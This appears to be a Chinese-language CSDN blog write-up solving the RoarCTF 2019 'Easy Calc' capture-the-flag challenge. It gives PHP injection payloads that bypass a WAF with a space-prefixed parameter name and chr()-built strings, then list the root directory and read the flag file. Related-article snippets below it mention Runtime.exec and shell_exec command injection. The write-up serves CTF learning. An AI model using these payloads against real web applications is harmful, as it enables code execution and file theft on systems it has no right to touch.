RoarCTF 2019Easy Calc表达式注入

最新推荐文章于 2023-02-08 12:15:47 发布
最新推荐文章于 2023-02-08 12:15:47 发布
阅读量285 收藏
点赞数
分类专栏: ctfWP 文章标签: unctf 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20533167/article/details/113727674
版权

[RoarCTF 2019]Easy Calc表达式注入 - 幕布

  • image

  • image

接着发现了api的接口地点calc.php和get的参数

  • image

直接url后面加上calc.php显示了一部分源码

  • image

可以发现过滤了很多的东西,并且计算器的页面上是只允许输入数字的,所以可以用带空格的数字绕过(用? num代替?num)

scandir("/")扫一下根目录,"/"被waf过滤了,单双引号也被过滤了。

? num=var_dump(scandir(chr(47)))

  • image

?num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

  • image

var_dump(…)绕过包含单双引号的waf
file_get_content()获取文件内容

4pri1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF学习笔记——Easy Calc
Obs_cure的博客
09-06 1263
一、[RoarCTF 2019]Easy Calc 1.题目 2.解题步骤 发现框框…应该是注入题…源码中提示有个waf,继续看源码,发现有个calc.php,进去看看 初步理解应该是用num传参,然后返回计算结果,这个php文件用于过滤非法字符。 被拦下来了,大概是利用num构造一个payload,不能含有字母和非法字符,只能有数字和符号 这里已经不会了,看writeup吧… 3.总结 4.参考资料 [RoarCTF 2019]Easy Calc(http走私 && 利用PHP的
tosser:在 JavaScript 中评估 CSS calc 表达式
06-23
评估 JavaScript 中的表达式,压缩后不到 1k。 这个项目背后的动机是构建一个工具来简化多个 calc() 位置之间的元素动画。 像素更容易使用。 例子 单一表达 // Find the element to evaluate against var ...
NCTF2022 calc题目复现
m0_62422842的博客
12-10 1121
这都是在基于system函数执行的条件下(无论是php还是python),底层调用sh二进制文件,我们都可以注入环境变量来rce。换句话说,如果底层调用了sh -c命令的函数执行的话,具有环境变量注入条件,使用这个方法来getshell应该是可以的。这个赛题个人感觉质量很高,能够从中学习到很多知识。
[JAVA安全分享]从第二届网刃杯CTF题目学习JAVA SPEL表达式注入
GX233的博客
04-27 1882
SPEL注入
【CTF】【cve_2022_22890】Spring Data MongoDB SpEL表达式注入漏洞
菜菜的成长
02-08 510
cve_2022_22890漏洞应用 学习下反弹shell
[GKCTF2021]babycat
Y4tacker的博客
07-18 1216
文章目录写在前面babycat 写在前面 是Java没错了,冲它 babycat 发现接口直接post发包注册一个号登录进去 此时我们可以看见不管怎样role都是guest,后台只有管理员有上传权限 我们需要关注如何成为admin,但是文件下载那里可以目录穿越首先读取web.xml <web-app> <servlet> <servlet-name>register</servlet-name> <servlet-class&gt
表达式注入1
08-03
例如,通过`T(java.lang.Runtime).getRuntime().exec(/"calc/")`这样的表达式,攻击者可以执行系统命令。 JSP和JSTL_EL是另一种常见的表达式注入场景。JSP的EL表达式允许直接访问Java对象,如`${expression}`,如果...
calc_可以计算表达式的值_
10-02
可以计算表达式的值。如 ex="30.0*sqrt(1-pow(((pow(30.0+20.0
深入理解CSS中的数学表达式calc()
11-21
数学表达式calc()是CSS中的函数,主要用于数学运算。使用calc()为页面元素布局提供了便利和新的思路。本文将介绍calc()的相关内容 定义 数学表达式calc()是calculate计算的缩写,它允许使用+、-、*、/这四种运算符,...
Calc Easy-开源
05-29
一个相当简单的快速计算器实现示例。
SimpleCalc:这是一个非常简单的计算器,它使用基本运算符和浮点数
03-07
简单计算 这是一个非常简单的计算器,它使用基本运算符和浮点数。 使用:python3 Calc.py
web buuctf [RoarCTF 2019]Easy Calc1
weixin_44214568的博客
08-20 175
1. 这里面一共两个问题,一个是waf(WEB应用层上的防御策略),一个是脚本 2.根据提示我们查看一下calc.php文件 这段代码可以看到num传参的时候,哪些值会被过滤掉 脚本的绕过因为有代码所有可以有针对性的写,问题是我们需要得到权限,就必然会输入字符语句,但是字符会报错,所以问题在于waf的绕过(我想用多阶注入,但是没有节点),于是waf绕过一个是去改num的值,另外一个是改num,改num的值我是改不了,因为不知道里面写的啥,我们就改num,现在的问题是既要改num还要使nu..
[RoarCTF 2019]Easy Calc
沐目的博客
10-18 1万+
1.知识点 1.1PHP的字符串解析特性 这是别人对PHP字符串解析漏洞的理解, 我们知道PHP将查询字符串(在URL或正文中)转换为内部$_GET或的关联数组$_POST。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id...
[0CTF2019]calcalcalc js污染,bool注入
a3320315的博客
02-10 756
本题是2019 RCTF calcalcalc的改版,这次限制了之前的时间延迟注入的问题,同时需要Bypass validator: validate(value: any, args: ValidationArguments) { const str = value ? value.toString() : ''; if (str.length === 0) { ...
BUUCTF之[RoarCTF 2019]Easy Calc
qq_43147309的博客
07-17 429
1.题 2.题样 3.测试,数字,字母: 字母都不能计算: 查看源码,说有WAF,看到提示有一个calc.php文件,访问试试: ![](https://img-blog.csdnimg.cn/20200717120212511.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzMTQ3MzA5,size_16,color_FFFF
ctf [RoarCTF 2019]easy_calc
eliforsharon的博客
10-08 229
又学到了新的东西所以记录一下 首先很容易就能找到calc.php,但是url的get却输入不了字符,查询以后才发现要运用PHP的字符串解析特性。 利用PHP的字符串解析特性 利用PHP的字符串解析特性Bypass 这篇文章讲的蛮详细的,而本题的waf也应该是只允许输入数字,不允许输入字符串,用num=%20就可以bypass啦。 然后就可以通过chr进行绕过了。 查看目录 var_dump(scandir(chr(47))); 查看flagg var_dump(file_get_contents(c
关于命令执行/注入 以及常见的一些绕过过滤的方法
小白渣的博客
02-29 1万+
打开题目直接给了源码, <?php $str=""; if(!empty($_GET)){ $str=$_GET["calc"]; } ?> 以及<?php echo "result:".shell_exec("echo $str | bc"); ?> 可以看出其没有对用户输入的内容进行一定过滤直接传给shell_exec函数执行。所以存在命令行漏洞。 这...
CTF_Web:如何认识并计算一个正则表达式
AFCC_的博客(Web_Dog)
08-19 934
0x00 前言 整理CTF中web 的基础知识时发现很多都会与正则匹配相结合,这篇文章来学习一下正则表达式的相关知识。在读懂一个正则表达式的要求后,如何去饶过他也是很关键的,这里使用菜鸟教程的一个在线的正则匹配会比较方便:正则表达式在线测试。 0x01 什么是正则表达式 正则表达式(regular expression)描述了一种字符串匹配的模式(pattern),可以用来检查一个串是否含有某种子串、将匹配的子串替换或者从某个串中取出符合某个条件的子串等。当然实现什么功能,最后还是要看使用什么匹配模式,本质
CTF之图片隐写
热门推荐
龙乐的专栏
08-15 6万+
图片隐写1:chal.png,图片如下: 题目图片即为一张白板,用Stegsolve.jar工具打开,向右疯狂点箭头得到flag: 题目2:Here.png: 直接拖到kali里用binwalk -e Here.png得到释放出的文件夹中有flag.txt,打开即得到flag。   题目3:flag.png: 这个是LSB隐写: 首先用Stegsolve.jar打...
[roarctf 2019]easy calc
最新发布
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值